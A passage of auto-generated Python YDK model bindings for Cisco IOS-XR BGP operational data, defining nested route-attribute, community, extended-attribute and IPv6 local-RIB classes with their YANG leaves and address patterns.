self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-in-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast']['meta_info']
class Ipv6Unicast(_Entity_):
"""
IPv6 Unicast
.. attribute:: loc_rib
Local rib route table
**type**\: :py:class:`LocRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib>`
**config**\: False
.. attribute:: open_config_neighbors
Neighbor list
**type**\: :py:class:`OpenConfigNeighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast, self).__init__()
self.yang_name = "ipv6-unicast"
self.yang_parent_name = "afi-safi-table"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("loc-rib", ("loc_rib", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib)), ("open-config-neighbors", ("open_config_neighbors", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors))])
self._leafs = OrderedDict()
self.loc_rib = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib()
self.loc_rib.parent = self
self._children_name_map["loc_rib"] = "loc-rib"
self.open_config_neighbors = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors()
self.open_config_neighbors.parent = self
self._children_name_map["open_config_neighbors"] = "open-config-neighbors"
self._segment_path = lambda: "ipv6-unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast, [], name, value)
class LocRib(_Entity_):
"""
Local rib route table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib, self).__init__()
self.yang_name = "loc-rib"
self.yang_parent_name = "ipv6-unicast"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "loc-rib"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "loc-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
